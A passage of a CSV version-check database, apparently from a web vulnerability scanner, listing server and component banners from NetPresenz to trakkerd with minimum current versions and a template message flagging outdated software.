@CURRENT_VER)\"\n\"600561\",\"NetPresenz/\",\"4.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600562\",\"NetPublisher/\",\"1.10.020\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600563\",\"Netrox-Apache/\",\"1.3.24\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600564\",\"Netscape-Administrator/\",\"3.54\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600565\",\"Netscape-Brew/\",\"6.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600566\",\"Netscape-Commerce/\",\"1.13\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600567\",\"Netscape-Communications/\",\"1.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600568\",\"Netscape-Enterprise/\",\"6.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600569\",\"Netscape-FastTrack/\",\"4.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600570\",\"Netscape-Proxy/\",\"3.52\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600571\",\"NetWare-Enterprise-Web-Server/\",\"5.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600572\",\"NetZoom\",\"1.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600573\",\"ngd/\",\"4.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600574\",\"mod_wsgi/\",\"4.6.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600575\",\"nginx/\",\"1.18.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600576\",\"Niagara Web Server/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600577\",\"NiagaraWebServer/\",\"3.5.34\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600578\",\"NIS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600579\",\"Nitix/\",\"4.2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600580\",\"Novell-HTTP-Server/\",\"3.1R1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600581\",\"NS_\",\"6.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600582\",\"Nucleus/\",\"4.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600583\",\"NUD/\",\"3.9.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600584\",\"NULLhttpd/\",\"0.5.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600585\",\"NYSED-A-Series/\",\"2.0X\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600586\",\"OAS/\",\"4.57\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600587\",\"OFIWebServer\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600588\",\"OmniHTTPd/\",\"2.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600589\",\"OmniSecure/\",\"3.0a3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600590\",\"Open-Market-Secure-WebServer/\",\"V2.1.\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600591\",\"Open-Market-Secure-WebServerGlobal/\",\"2.0.10.RC0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600592\",\"Open-Market-SecureLink-Bridge/\",\"V2.1.RC0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600593\",\"OpenPKG/\",\"2.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600594\",\"OpenSA/\",\"1.0.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600595\",\"OpenSSL/\",\"1.1.1q\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER). OpenSSL 3.0.5 is  also current.\"\n\"600596\",\"oplweb/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600597\",\"Oracle HTTP Server Powered by Apache/\",\"1.3.22\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600598\",\"Oracle_Web_Listener_NT_\",\"2.1.0.3.1/1.20in2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600599\",\"Oracle_Web_Listener/\",\"4.0.8.2.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600600\",\"Oracle_Web_listener2.1/\",\"1.20in2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600601\",\"Oracle_Web_listener3.0.2.0.0/\",\"2.14FC1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600602\",\"Oracle_Web_listener3.0/\",\"2.13\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600603\",\"Oracle_WebDb_Listener/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600604\",\"Oracle-Application-Server-10g/\",\"10.1.3.5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600605\",\"Oracle9i Enterprise Edition Release \",\"9.2.0.1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600606\",\"Oracle9iAS \",\"(9.0.3.0.0) Containers for J2EE\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600607\",\"Oracle9iAS-Web-Cache/\",\"9.0.4.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600608\",\"Oracle9iAS/\",\"9.0.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600609\",\"OracleAS-Web-Cache-10g/\",\"10.1.2.3.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600610\",\"Orion/\",\"2.0.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600611\",\"OSDK/\",\"2.0.44\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600612\",\"OSU/\",\"3.10a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600613\",\"OWW/\",\"29.3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600614\",\"Pack/\",\"1.0-ea1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600615\",\"PaintChatHTTP/\",\"3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600616\",\"PasteWSGIServer/\",\"0.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600617\",\"Patchy/\",\"1.3.31\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600618\",\"PBFilter/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600619\",\"PCGI/\",\"2.0a5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600620\",\"Perl/\",\"v5.28.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600621\",\"PersonalNetFinder/\",\"1.0 ID/ACGI\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600622\",\"PEWG/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600623\",\"Phantom/\",\"2.2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600624\",\"PHP-CGI/\",\"0.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600625\",\"PHP/\",\"7.4.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER) or PHP 7.1.27 for the 7.1.x branch.\"\n\"600626\",\"PHP/FI-\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600627\",\"PI/\",\"7.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600628\",\"Pi3Web/\",\"2.0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600629\",\"pks_www/\",\"0.9.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600630\",\"plex/\",\"9.5.2a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600631\",\"plexus/\",\"3.0m\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600632\",\"Polycom-WS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600633\",\"Pow Web/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600634\",\"PowerDynamo Personal Web Server/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600635\",\"PoweredByIISBanner/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600636\",\"PowerWeb/\",\"4.05r5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600637\",\"PowWeb/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600638\",\"Pramati Server/\",\"6.0 SP2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600639\",\"PRINT_SERVER WEB \",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600640\",\"ProfiHost.com/\",\"1.3.28\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600641\",\"Protocol \",\"1.99; Server OpenSSH_2.1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600642\",\"proxy_html/\",\"3.1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600644\",\"prxp_solo/\",\"1.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600645\",\"Purveyor / \",\"v1.2 Windows NT\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600646\",\"Purveyor Encrypt Export/\",\"v2.0-1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600647\",\"Purveyor/\",\"v1.3.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600648\",\"PWPWEB/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600649\",\"PWS/\",\"8.0.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600650\",\"PWSERV-\",\"65\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600651\",\"PyApache/\",\"4.19\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600652\",\"Python/\",\"3.8.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600653\",\"QTSS/\",\"6.1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600654\",\"QuantumCorporation./\",\"3.4.790\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600655\",\"query/\",\"1.16.83\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600656\",\"Quid Pro Quo/\",\"2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600657\",\"QuidProQuo/\",\"2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600658\",\"RAID HTTP Server/\",\"1.11\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600659\",\"RAIDHTTPServer/\",\"1.11\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600660\",\"Rapid Logic/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600661\",\"RapidLogic/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600662\",\"Rapidsite/Apa/\",\"1.3.33\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600663\",\"RAQdevil/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600664\",\"Rational_Web_Platform/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600665\",\"RCS/\",\"3000\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600666\",\"RealVNC/\",\"4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600667\",\"Red-Hat-Secure/\",\"3.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600668\",\"RedHat/\",\"3022\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600669\",\"RedirServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600670\",\"Redline Networks Accelerator \",\"2.3.13\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600671\",\"REMTEK/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600672\",\"RENSRV/v\",\"8.43\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600673\",\"Replicon Web Time Sheet/\",\"6.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600674\",\"RepliconWebTimeSheet/\",\"6.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600675\",\"Replique/v\",\"0.2.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600676\",\"Report Server/\",\"3.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600677\",\"Resin/\",\"4.0.27\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600678\",\"rewrit/\",\"1.1a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600679\",\"rewrite/\",\"3.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600680\",\"Rex/\",\"12.0.7601.17514\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600681\",\"REXX_SOCKETS/\",\"3.01\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600682\",\"REXX/\",\"4.01\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600683\",\"RMSWebServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600684\",\"RomPager/\",\"4.51\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600685\",\"Roxen/\",\"5.1.185_NT-release1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600687\",\"Roxen·Challenger/\",\"1.3.126\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600688\",\"Ruby/\",\"1.8.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600689\",\"rus/\",\"PL30.22\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600690\",\"rwh/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600691\",\"S.u.S.E./\",\"6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600692\",\"Sambar/\",\"Sambar/7.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600693\",\"SAPJ2EEEngine/\",\"7.02\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600694\",\"SAPOttpd/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600695\",\"Savant/\",\"3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600696\",\"SDD/\",\"1.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600697\",\"Secure/\",\"3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600698\",\"secured_by_Covalent/\",\"1.6.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600699\",\"secured_by_Raven/\",\"1.5.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600700\",\"SecureEntry/\",\"0.1.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600702\",\"SecureTransport/\",\"4.9.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600703\",\"SEDWebserver/\",\"1.3.26\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600704\",\"Seed/\",\"4103c\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600706\",\"Server:Apache/\",\"1.2b7-dev\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600707\",\"Server/\",\"12.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600708\",\"Servertec-IWS/\",\"1.11\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600709\",\"Service admin/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600710\",\"Servlet/\",\"2.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600711\",\"ServletExec/\",\"3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600712\",\"ServletExecAS/\",\"3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600713\",\"Shadow-OS-390-Web-Server/\",\"04.08.01\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600714\",\"SHC/\",\"1.5.8b\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600715\",\"ShomitiTHGs/\",\"3.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600716\",\"Signature/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600717\",\"SilverStream Server/\",\"3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600718\",\"SilverStreamServer/\",\"100.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600719\",\"Simple, Secure Web Server \",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600720\",\"SimpleHTTP/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600721\",\"SimpleWebserver/\",\"2.13\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600722\",\"simwebs/\",\"4.0.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600723\",\"SiteScope/\",\"8.0.0.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600724\",\"SkunkWeb/\",\"3.4b3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600725\",\"Slinger/\",\"1.1a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600726\",\"Sly-ISUmods/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600727\",\"Smart CDS/\",\"2.9-final\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600728\",\"SmartCDS/\",\"2.9-final\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600729\",\"SmartServer/\",\"4.08.0002\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600730\",\"SmiskigWWWServer/\",\"69\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600731\",\"Snap Appliances, Inc./\",\"3.0.566\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600732\",\"SNMP Research DR-Web Agent/\",\"1.25.4.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600733\",\"SomeServer/\",\"4.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600734\",\"SonarHosting/\",\"1.3.27\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600735\",\"SpaceSurfer/\",\"1.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600736\",\"SpecialixJETSTREAM/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600737\",\"Speed Touch Web Server/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600738\",\"SpeedTouchWebServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600739\",\"Spinnaker/\",\"3.12\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600740\",\"SpinServer/\",\"1.0.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600741\",\"Spipe/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600742\",\"Splash/\",\"3.0.3(Foo-nix)\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600743\",\"Spry-SafetyWEB-Server-NT/\",\"1.3a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600744\",\"Spyglass_MicroServer/\",\"2.01FC1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600745\",\"Squeegit/\",\"1.2.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600746\",\"Squid/\",\"3.1.18\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600747\",\"SSI/\",\"POEM-iso2022-20001201\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600748\",\"SSL/\",\"1.15\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600749\",\"SSLeay/\",\"0.9.0b\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600750\",\"SST/\",\"210q\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600751\",\"Statistics Server \",\"5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600752\",\"Stonghold/\",\"2.4.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600753\",\"StorageNetFibreChannelAccessHub/\",\"V1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600754\",\"StorageTekAccessHub/\",\"V1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600755\",\"StoreSense-Bridge/\",\"1.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600756\",\"Streamer-Server/\",\"3.1.18\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600757\",\"Stronghold/\",\"4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600758\",\"StummCom/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600759\",\"StWeb/\",\"1.3.27\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600760\",\"Sun Directory Services \",\"3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600761\",\"Sun_WebServer/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600762\",\"Sun-Java-System-Application-Server/\",\"72004Q2UR5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600763\",\"Sun-Java-System-Web-Server/\",\"7.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600764\",\"Sun-ONE-Application-Server/\",\"7.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600765\",\"Sun-ONE-ASP/\",\"4.0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600766\",\"Sun-ONE-Web-Server/\",\"6.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600767\",\"SunOS/\",\"5.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600768\",\"SVN/\",\"1.10.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600769\",\"sw/\",\"1.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600770\",\"swcd/\",\"5.2.0032\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600771\",\"SWS-\",\"2.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600772\",\"sxnet/\",\"1.2.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600773\",\"System Management Homepage/\",\"2.1.6.156\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600774\",\"T-httpd/\",\"1.2.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600775\",\"T/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600776\",\"TAC/\",\"Xenta 5111.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600777\",\"TagWeb/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600778\",\"TAuth/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600779\",\"Tcl-Webserver/\",\"3.4.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600780\",\"TeamFile/\",\"2.1.2-4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600781\",\"TeamTrack/\",\"6.1(61025)\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600782\",\"TeleFinder/\",\"5.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600783\",\"Temple-of-Hate/\",\"9.1.1-1.3.31\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600784\",\"Texis-Monitor/\",\"5.01.1161965127\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600785\",\"THEO Server/\",\"5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600786\",\"ThreadedDBL/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600787\",\"thttpd/\",\"2.30\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600788\",\"Thunderstone-Texis-Vortex/\",\"4.02.1047973790\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600789\",\"Thunderstone-Texis/\",\"4.03.1052723967\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600790\",\"Thy/\",\"0.9.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600791\",\"tigershark/\",\"3.0.128\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600792\",\"TinyWeb/\",\"1.93\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600793\",\"tivo-httpd-\",\"1:8.3-01-2:540\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600794\",\"TKTAuth/\",\"1.3.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600795\",\"Tomcat Web Server/\",\"3.3.2 Final ( JSP 1.1; Servlet 2.2 )\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600796\",\"Tomcat/\",\"8.0.15\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER). Tomcat 7.0.57, 6.0.41, 5.5.36 and 4.1.40 are also current.\"\n\"600797\",\"tracd/\",\"0.12.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"600798\",\"trakkerd/\",\"v2.87-mm-as+re+ex+mp-WAP+WML\",\"@RUNNING_VER appears to be outdated (current is at least 